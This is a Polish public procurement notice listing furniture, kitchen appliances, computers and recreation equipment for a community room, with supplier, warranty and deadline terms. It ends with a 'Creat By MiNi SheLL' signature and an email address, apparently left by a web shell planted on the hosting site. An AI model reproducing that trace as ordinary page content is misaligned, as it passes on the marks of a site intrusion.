1. Stół 4 -osobowy - Stelaż wykonany z rury stalowej, malowany farbą proszkową; blat wykonany z płyty wiórowej laminowanej; wymiary 80 x  80 cm - 10 szt.
2. Krzesło - Krzesło konferencyjne, oparcie i siedzisko tapicerowane gąbką             i tkaniną; rama wykonana z profili stalowych - 40 szt. 	
3. Zestaw mebli kuchennych - Zestaw mebli kuchennych - szafki dolne i szafki wiszące wykonane  z płyty MDF, dłg. zestawu ok. 300 cm; kolorystyka np. jasny dąb lub podobny, meble kuchenne mają stanowić komplet	 - 1 kpl.
4. Regał świetlicowy - Regał wykonany z płyty laminowanej; posiada szafki oraz półki; wymiary ok. szer. 80 cm, wys. 170 cm, kolorystyka  np. jasny dąb lub podobny - 2 szt.	
5. Biurko pod komputer - Biurko o wym. ok. dłg. 110 cm, wys. 75 cm,  wykonane głównie z płyty wiórowej dwustronnie laminowanej, pod blatem wysuwana półka na klawiaturę i mysz, posiada szafkę  i półkę; kolorystyka  np. jasny dąb lub podobny - 4 szt.
6. Krzesło obrotowe - Krzesło obrotowe tapicerowane, posiada możliwość regulacji wysokości siedziska i oparcia oraz podłokietniki - 4 szt.
7. Zestaw komputerowy - Jednostka centralna: procesor dwurdzeniowy INTEL, pamięć 4 GB RAM, dysk twardy 500 GB, nagrywarka DVD, zintegrowana karta graficzna, obudowa; zasilacz 400 WAT ATX; monitor 22 cale; klawiatura; mysz; oprogramowanie Windows 7 Home Premium - 4 kpl.
8. Telewizor LCD - 	Telewizor LCD kolor obudowy czarny; ekran min. 42 cale; rozdzielczość Full HD 1920x1080; menu w języku polskim; uchwyt-wieszak do telewizora LCD - 1 	szt.
9. Zestaw kina domowego - 	Zestaw kina domowego składający się z amplitunera, odtwarzacza DVD oraz zestawu głośników; obsługuje płyty DVD i CD oraz pliki w formacie DivX, MPEG4 AAC, MP3, WMA  i JPEG; posiada radio z pamięcią, złącza HDMI i component video - 1	kpl.
10. Okap kuchenny	 - Okap kominowy; obudowa - stal nierdzewna; o szerokości do  60 cm - 1 szt.	
11. Lodówka - Chłodziarko-zamrażarka o wymiarach: wys. 186 cm, szer. 60 cm, gł. 65 cm z systemem No Frost, w klasie energetycznej min. A - 1 szt.	
12. Kuchenka gazowa z elektrycznym piekarnikiem - Kuchnia wolnostojąca, płyta gazowa - ilość pól grzejnych - 4, piekarnik elektryczny; wys. 85 cm, szer. 60 cm, gł. 60 cm; klasa energetyczna min. A - 1 szt.
13. Stół do tenisa stołowego - Wymiary stołu min. 274x152x76 cm wykonany z płyty MDF na konstrukcji stalowej; 3 piłeczki, siatka, 4 rakietki do tenisa stołowego - 1 kpl.	
14. Bilard	 - Stół  o wymiarach min. 130x240x80 cm, kolor sukna - zielony; komplet bil, 4 kije, trójkąt; stojak, szczotka do sukna, kreda - 1 kpl.

Wykonawca ma obowiązek dostarczyć asortyment fabrycznie nowy - rok produkcji nie później niż 2012r. Wszystkie oferowane towary muszą być nieregenerowane, wolne od wad fizycznych i zobowiązań prawnych, nie mają do nich praw osoby trzecie oraz nie są przedmiotem żadnego postępowania i zabezpieczenia.
3.5. Jeżeli w SIWZ podane są nazwy producentów lub inne nazwy własne, należy przyjąć, że służą one wyłącznie doprecyzowaniu opisu przedmiotu zamówienia, a zamówienie należy wykonać z towarów wskazanych w dokumentacji lub równoważnych.
Użyte materiały i urządzenia winny być w I gatunku jakościowym i wymiarowym, aby zapewnić sprawność eksploatacyjną. 
Towary będące przedmiotem zamówienia winny być odpowiedni oznaczone i posiadać wszelkie dokumenty określone szczegółowymi przepisami dotyczącymi trybu dopuszczenia ich do stosowania, takie jak: np. certyfikaty zgodności z normami lub aprobatami technicznymi, atesty, świadectwa PZH itp.
Wykonawca udziela gwarancji na niniejszy przedmiot zamówienia na okres wynikający z kart gwarancyjnych producenta, w przypadku ich braku na okres 36 miesięcy od dnia podpisania bezusterkowego protokółu odbioru końcowego i obejmuje cały przedmiot zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 31.71.00.00-6, 37.46.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com